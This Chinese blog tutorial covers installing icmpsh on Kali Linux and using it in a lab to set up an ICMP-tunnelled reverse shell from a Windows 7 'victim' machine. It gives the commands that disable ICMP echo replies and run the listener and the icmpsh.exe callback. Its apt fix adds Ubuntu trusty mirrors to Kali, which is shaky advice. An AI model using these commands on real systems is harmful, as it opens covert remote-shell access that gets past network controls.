本文介绍了如何在Kali Linux中安装和使用icmpsh工具,通过icmp隧道建立从Kali到Win7的反弹shell。首先,解决apt-get源的问题,采用阿里云镜像源,并更新公钥。接着,安装python-impacket库,关闭系统icmp应答,然后在两台设备上执行相应命令完成隧道建立。最后,成功在Kali上接收到来自Win7的反弹shell。
icmp隧道
icmpsh
使用kali作为攻击机, 使用win7作为受害机
kali安装icmpsh
git clone https://github.com/inquisb/icmpsh.git
apt-get install python-impacket //这步很可能存在问题
问题的解决方式:
cp /etc/apt/sources.list /etc/apt/sources.list.bak //备份
vim /etc/apt/sources.list //替换源文件
把源文件中的全部#注释掉,然后添加上下面的
deb http://mirrors.aliyun.com/ubuntu/ trusty main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ trusty main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ trusty-security main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ trusty-security main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ trusty-updates main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ trusty-updates main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ trusty-backports main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ trusty-backports main restricted universe multivers
deb http://mirrors.aliyun.com/ubuntu/ trusty-proposed main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ trusty-proposed main restricted universe multiverse
保存之后
apt-get update //这一步很可能又出问题了,大概是说公钥问题
看看公钥是什么,执行下面命令
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 1397BC53640DB551
//记得要改一下公钥改成自己报错的那个,如果有多个公钥报错,那就多执行几次命令一个一个添加
然后再次执行就能成功了
apt-get update
apt-get upgrade
apt-get install python-impacket
到此就算是准备好了,然后到工具目录下
因为icmpsh工具要代替系统本身的ping命令的应答程序,所以需要输入如下命令来关闭本地系统的icmp应答
sysctl -w net.ipv4.icmp_echo_ignore_all=1 //如果要恢复icmp应答,就改值为0即可
使用工具
python icmpsh_m.py [kali的ip] [win7的ip]
然后到win7(需要把工具目录下的icmpsh.exe文件上传到win7)
icmpsh.exe -t [kali的ip]
回到kali命令行页面,看到反弹shell已经成功了
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
